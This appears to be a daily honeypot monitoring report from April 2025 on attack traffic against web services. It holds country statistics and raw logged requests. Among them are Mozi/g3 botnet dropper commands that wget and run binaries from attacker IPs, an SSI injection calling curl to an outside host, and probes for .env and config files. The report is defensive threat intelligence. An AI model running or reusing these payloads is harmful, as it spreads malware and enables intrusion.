Table of Contents

Daily Report: 2025-04-25
#

Executive summary
#

interaction report on http service of various Hhoneypot around the world.

Executive summary
OT report simplified
Botnet dropper behaviour
List of request
List of country_iso_code

executive_summary
#

In today’s repport, we detected 4 stage 1 IP address(es), linked to 3 dropper URL(s).

There are 45 new requests that have never been observed before (these were added to the monitored request database.).

A total of 2001 requests were recorded during the day, originating from 4 different countries, with a peak of 584 requests coming from GB.

ot_simplified_report
#

simplified report for medium-level interactions with honeypots that mimic industrial systems (web site loading, or interactions with the website), for more contact us on social@shoggoth.industries.

source_country	targeted_country
US	Germany
US	Germany
US	Germany
US	Dubai
CN	Georgia
GB	Georgia

botnet_dropper_behaviour
#

remote_addr	request
123.4.49.93	GET /shell?cd+/tmp;rm+-rf+*;wget+http://123.4.49.93:48403/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
83.150.218.92	GET /shell?cd+/tmp;rm+-rf+g3;nohup+wget+http:/\x5C/83.150.218.222/g3;chmod+777+g3;./g3+jaws; HTTP/1.1
83.150.218.222	GET /shell?cd+/tmp;rm+-rf+g3;nohup+wget+http:/\x5C/83.150.218.222/g3;chmod+777+g3;./g3+jaws; HTTP/1.1
83.150.218.222	GET /shell?cd+/tmp;rm+-rf+g3;nohup+wget+http:/\x5C/83.150.218.92/g3;chmod+777+g3;./g3+jaws; HTTP/1.1

request
#

The list of requests presented here are those that have not yet been yet integrated into the request database.

	number_of_occurence	request
214	1	GET /config/index?time=1745596450565297336 HTTP/1.1
215	1	GET /api/bin/440393?time=1745597181616067725 HTTP/1.1
216	1	POST /api/user/binLookup?time=1745597182207159339 HTTP/1.1
217	1	GET /api/bin/440393?time=1745597551802198136 HTTP/1.1
218	1	POST /api/user/binLookup?time=1745597552192685009 HTTP/1.1
219	1	\x04\x01\x01\xBB@\xE9\xA3h\x00
220	1	\x04\x01\x01\xBB@\xE9\xA3cadm:12345\x00
222	1	GET /config/index?time=1745595063849169545 HTTP/1.1
224	1	GET /config/index?time=1745595445469337750 HTTP/1.1
225	1	GET /config/index?time=1745596414112870783 HTTP/1.1
226	1	GET /api/bin/440393?time=1745597117308227144 HTTP/1.1
227	1	POST /api/user/binLookup?time=1745597117816093019 HTTP/1.1
228	1	GET /api/bin/440393?time=1745598369839750191 HTTP/1.1
229	1	POST /api/user/binLookup?time=1745598370241415990 HTTP/1.1
308	1	POST /api/user/binLookup?time=1745598830556946095 HTTP/1.1
344	1	GET /VabC HTTP/1.1
345	1	GET /GUyH HTTP/1.1
348	1	GET /env.env HTTP/1.1
355	1	GET /env.html HTTP/1.1
356	1	GET /env/ HTTP/1.1
357	1	GET /.env/ HTTP/1.1
358	1	GET /.env/.env HTTP/1.1
359	1	GET /environment.json HTTP/1.1
361	1	GET /env.example HTTP/1.1
363	1	GET /,env HTTP/1.1
364	1	GET /_env HTTP/1.1
373	1	GET /settings.cfg HTTP/1.1
406	1	GET /wp-includes/ALFA_DATA/alfacgiapi/ HTTP/1.1
431	1	GET /config/index?time=1745597359361746420 HTTP/1.1
432	1	GET /config/index?time=1745598245202688129 HTTP/1.1
433	1	GET /api/bin/440393?time=1745598830073593270 HTTP/1.1
440	1	GET /OdinHttpCall1745563401 HTTP/1.1
441	1	GET /Odin/http/call1745563401 HTTP/1.1
449	1	GET /odinhttpcall1745563401 HTTP/1.1
452	1	GET /api/bin/440393?time=1745601698877915315 HTTP/1.1
453	1	POST /api/user/binLookup?time=1745601699392251016 HTTP/1.1
474	1	GET /incl/image_test.shtml?camnbr=%3C%21–%23exec+cmd%3D%22curl+http%3A%2F%2F107.189.21.38%2F%24%28id%29%22+–%3E HTTP/1.1
476	1	GET /settings.inc.php HTTP/1.1
481	1	GET /staging2/.env HTTP/1.1
487	1	GET /local.inc.php HTTP/1.1
488	1	GET /local.ini HTTP/1.1
491	1	GET /local.xml HTTP/1.1
495	1	\x04\x01\x01\xBB@\xE9\xA3i\x00
496	1	\x04\x01\x01\xBB@\xE9\xA3jadm:12345\x00
505	1	GET /parameters.yaml HTTP/1.1

country_iso_code
#

	number_of_occurence	country_iso_code
0	584	GB
1	293	NL
2	290	US
3	163	SC
4	97	PL
5	87	DE
6	70	CN
7	64	BG
8	53	SG
9	50	BE
10	48	IN
11	33	HK
12	24	CA
13	21	CH
14	16	HR
15	15	FR
16	10	KR
17	8	PT
18	8	VN
19	7	RU
20	7	GH
21	6	UA
22	6	TR
23	4	JP
24	4	BR
25	4	AU
26	3	IR
27	3	ZA
28	3	CO
29	2	GE
30	2	TH
31	2	ID
32	2	TW
33	2	LT
34	1	AL
35	1	CZ
36	1	HU
37	1	MC
38	1	NO
39	1	PA
40	1	IT
41	1	BD
42	1	AT
43	1	AO

Report: 2025-04-24

24 April 2025·358 words

Repport Daily

Report: 2025-04-23

23 April 2025·512 words

Repport Daily

Report: 2025-04-22

22 April 2025·410 words

Repport Daily

	number_of_occurence	country_iso_code
0	584	GB
1	293	NL
2	290	US
3	163	SC
4	97	PL
5	87	DE
6	70	CN
7	64	BG
8	53	SG
9	50	BE
10	48	IN
11	33	HK
12	24	CA
13	21	CH
14	16	HR
15	15	FR
16	10	KR
17	8	PT
18	8	VN
19	7	RU
20	7	GH
21	6	UA
22	6	TR
23	4	JP
24	4	BR
25	4	AU
26	3	IR
27	3	ZA
28	3	CO
29	2	GE
30	2	TH
31	2	ID
32	2	TW
33	2	LT
34	1	AL
35	1	CZ
36	1	HU
37	1	MC
38	1	NO
39	1	PA
40	1	IT
41	1	BD
42	1	AT
43	1	AO

	number_of_occurence	country_iso_code
0	584	GB
1	293	NL
2	290	US
3	163	SC
4	97	PL
5	87	DE
6	70	CN
7	64	BG
8	53	SG
9	50	BE
10	48	IN
11	33	HK
12	24	CA
13	21	CH
14	16	HR
15	15	FR
16	10	KR
17	8	PT
18	8	VN
19	7	RU
20	7	GH
21	6	UA
22	6	TR
23	4	JP
24	4	BR
25	4	AU
26	3	IR
27	3	ZA
28	3	CO
29	2	GE
30	2	TH
31	2	ID
32	2	TW
33	2	LT
34	1	AL
35	1	CZ
36	1	HU
37	1	MC
38	1	NO
39	1	PA
40	1	IT
41	1	BD
42	1	AT
43	1	AO

Daily Report: 2025-04-25#

Executive summary#

executive_summary#

ot_simplified_report#

botnet_dropper_behaviour#

request#

country_iso_code#

Related

Daily Report: 2025-04-25
#

Executive summary
#

executive_summary
#

ot_simplified_report
#

botnet_dropper_behaviour
#

request
#

country_iso_code
#

	number_of_occurence	country_iso_code
0	584	GB
1	293	NL
2	290	US
3	163	SC
4	97	PL
5	87	DE
6	70	CN
7	64	BG
8	53	SG
9	50	BE
10	48	IN
11	33	HK
12	24	CA
13	21	CH
14	16	HR
15	15	FR
16	10	KR
17	8	PT
18	8	VN
19	7	RU
20	7	GH
21	6	UA
22	6	TR
23	4	JP
24	4	BR
25	4	AU
26	3	IR
27	3	ZA
28	3	CO
29	2	GE
30	2	TH
31	2	ID
32	2	TW
33	2	LT
34	1	AL
35	1	CZ
36	1	HU
37	1	MC
38	1	NO
39	1	PA
40	1	IT
41	1	BD
42	1	AT
43	1	AO